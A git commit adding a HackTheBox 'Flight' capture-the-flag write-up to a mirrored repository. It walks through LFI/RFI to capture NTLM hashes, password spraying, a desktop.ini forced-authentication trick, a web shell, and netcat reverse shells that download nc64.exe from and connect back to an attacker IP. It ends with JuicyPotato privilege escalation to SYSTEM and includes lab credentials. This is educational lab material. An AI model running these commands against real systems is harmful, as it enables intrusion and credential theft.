mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Create Flight.md
This commit is contained in:
parent
31df988a9a
commit
800ae1745a
1 changed files with 263 additions and 0 deletions
263
HackTheBox/Flight.md
Normal file
263
HackTheBox/Flight.md
Normal file
|
@ -0,0 +1,263 @@
|
|||
# HackTheBox - Flight
|
||||
|
||||
## NMAP
|
||||
|
||||
|
||||
```bash
|
||||
Nmap scan report for 10.10.11.187
|
||||
Host is up (0.28s latency).
|
||||
Not shown: 65516 filtered tcp ports (no-response)
|
||||
PORT STATE SERVICE VERSION
|
||||
53/tcp open domain Simple DNS Plus
|
||||
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|
||||
| http-methods:
|
||||
| Supported Methods: POST OPTIONS HEAD GET TRACE
|
||||
|_ Potentially risky methods: TRACE
|
||||
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|
||||
|_http-title: g0 Aviation
|
||||
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
|
||||
135/tcp open msrpc Microsoft Windows RPC
|
||||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||||
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
|
||||
445/tcp open microsoft-ds?
|
||||
464/tcp open kpasswd5?
|
||||
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|
||||
636/tcp open tcpwrapped
|
||||
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
|
||||
3269/tcp open tcpwrapped
|
||||
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||
|_http-title: Not Found
|
||||
9389/tcp open mc-nmf .NET Message Framing
|
||||
49667/tcp open msrpc Microsoft Windows RPC
|
||||
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|
||||
49674/tcp open msrpc Microsoft Windows RPC
|
||||
49690/tcp open msrpc Microsoft Windows RPC
|
||||
49699/tcp open msrpc Microsoft Windows RPC
|
||||
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
|
||||
```
|
||||
|
||||
## PORT 139/445 (SMB)
|
||||
|
||||
Checking null authentication on SMB shows that we can't access any share through anonmyously
|
||||
|
||||
<img src="https://i.imgur.com/vtOncKe.png"/>
|
||||
|
||||
## PORT 80 (HTTP)
|
||||
|
||||
<img src="https://i.imgur.com/8ccuI6h.png"/>
|
||||
|
||||
The site didn't had anything there as it was just a page with no links also `gobuster` didn't showed anything interesting to as well
|
||||
|
||||
<img src="https://i.imgur.com/va9V6Uh.png"/>
|
||||
|
||||
So adding `flight.htb` in `/etc/hosts` file as we can see the domain name at the bottom of the page
|
||||
|
||||
<img src="https://i.imgur.com/LJ2UM2Z.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/tUiLVcp.png"/>
|
||||
|
||||
Fuzzing for subdomains using `wfuzz`
|
||||
|
||||
```bash
|
||||
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/p6r2VtD.png"/>
|
||||
|
||||
Adding this subdomain in hosts file and accessing the site
|
||||
|
||||
<img src="https://i.imgur.com/MkiUFyW.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/QUJXoxu.png"/>
|
||||
|
||||
Checking for Local File Inclusion it filters `..` if it's in the url but allows `/`
|
||||
|
||||
<img src="https://i.imgur.com/sxhcQ1Y.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/Mfn8VrC.png"/>
|
||||
|
||||
## Svc_apache
|
||||
|
||||
Running `wfuzz` again to fuzz for LFI payloads we find that we can just specify a file name without using `..`
|
||||
|
||||
<img src="https://i.imgur.com/QpRyOlh.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/r3e6K8Z.png"/>
|
||||
|
||||
Let's verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and use `responder` to capture NTLMv2 hash
|
||||
|
||||
<img src="https://i.imgur.com/Efv3OXq.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/QNZfpDs.png"/>
|
||||
|
||||
We have a hit so now running responder and accessing a fake share with `//IP/share`
|
||||
|
||||
```bash
|
||||
responder -I tun0
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/w2otusT.png"/>
|
||||
|
||||
```bash
|
||||
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/DFrZUfL.png"/>
|
||||
|
||||
Saving this hash in a file cracking it with `john`
|
||||
|
||||
```bash
|
||||
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/3xxMhYJ.png"/>
|
||||
|
||||
With the valid credentials we can start enumerating the shares and usernames through `crackmapexec`
|
||||
|
||||
<img src="https://i.imgur.com/MlDZ7Ix.png"/>
|
||||
Using `enum4linux` to query usernames and filtering usernames so that we can password spray on them
|
||||
|
||||
```bash
|
||||
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/45qCJWe.png"/>
|
||||
|
||||
## S.moon
|
||||
|
||||
Using either cme or kerbrute to perform password spary we'll get `S.Moon` having the same password
|
||||
|
||||
```bash
|
||||
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/gaotp0Q.png"/>
|
||||
|
||||
```bash
|
||||
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/svRtQ3C.png"/>
|
||||
Checking shares with s.moon, we see that we have write access on `shared`
|
||||
|
||||
<img src="https://i.imgur.com/ZMVtFmX.png"/>
|
||||
|
||||
## C.bum
|
||||
|
||||
On uploading `.scf ` file extension to perform forced authentication it didn't allowed us to upload that extension, not sure why
|
||||
|
||||
<img src="https://i.imgur.com/kvgRGyn.png"/>
|
||||
|
||||
But on uploading `desktop.ini` file it worked
|
||||
|
||||
```bash
|
||||
[.ShellClassInfo]
|
||||
IconResource=\\10.10.14.28\aa
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/7z2Bj1F.png"/>
|
||||
|
||||
Cracking this hash again with john
|
||||
|
||||
<img src="https://i.imgur.com/BtLOQUG.png"/>
|
||||
|
||||
## Foothold
|
||||
|
||||
This user has write access on `web` share which means that we can upload php file which will be reflected on schooled.flight.htb
|
||||
|
||||
<img src="https://i.imgur.com/B854BMb.png"/>
|
||||
|
||||
Uploading a php file calling `phpinfo()`
|
||||
|
||||
```php
|
||||
<?php phpinfo(); ?>
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/lSxOpDk.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/tN4sfft.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/fqblot6.png"/>
|
||||
|
||||
Having the ability to execute commands on the system we can try getting a reverse shell by uploading nc.exe and executing it
|
||||
|
||||
```bash
|
||||
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
|
||||
|
||||
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/kvWwE3b.png"/>
|
||||
|
||||
Since we already have credentials of `c.bum` we can execute commands through that user using `RunasC.exe`
|
||||
|
||||
<img src="https://i.imgur.com/mevnft1.png"/>
|
||||
|
||||
```powershell
|
||||
.\RunasCs.exe c.bum Tikkycoll_431012284 whoami
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/kOnEou7.png"/>
|
||||
|
||||
This user has full access on `C:\inetpub\Development`
|
||||
|
||||
<img src="https://i.imgur.com/H0s2gRQ.png"/>
|
||||
|
||||
These files are being hosted on port 8000, to access these files we need to port forward port 8000 using `chisel`
|
||||
|
||||
Runnnig the server on our machine
|
||||
|
||||
```bash
|
||||
chisel server --reverse -p 8001
|
||||
```
|
||||
|
||||
And running the client on the target machine
|
||||
|
||||
```powershell
|
||||
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/IGEHaoC.png"/>
|
||||
|
||||
Now transferring the aspx web shell in the development directory
|
||||
|
||||
```
|
||||
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'
|
||||
```
|
||||
|
||||
Accessing the file through the browser
|
||||
|
||||
<img src="https://i.imgur.com/pPW6xXv.png"/>
|
||||
|
||||
I tried executing nc.exe to get a reverse shell but it wasn't for some reason so instead I generated a msfvenom payload
|
||||
|
||||
<img src="https://i.imgur.com/o9UGgzz.png"/>
|
||||
|
||||
Transfer it and execute it
|
||||
|
||||
<img src="https://i.imgur.com/5ipfRDG.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/XSciDMW.png"/>
|
||||
|
||||
Checking privileges of `IIS appool`, it as `SeImpersonate` privilege enabled
|
||||
|
||||
<img src="https://i.imgur.com/K8jYNpK.png"/>
|
||||
|
||||
To abuse this, we can use `JuicyPotato-ng` to get a system shell
|
||||
|
||||
```
|
||||
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/v1l8N7U.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/TjBCxv6.png"/>
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- https://book.hacktricks.xyz/pentesting-web/file-inclusion
|
||||
- https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
|
||||
- https://github.com/Greenwolf/ntlm_theft
|
||||
- https://github.com/antonioCoco/RunasCs
|
Loading…
Reference in a new issue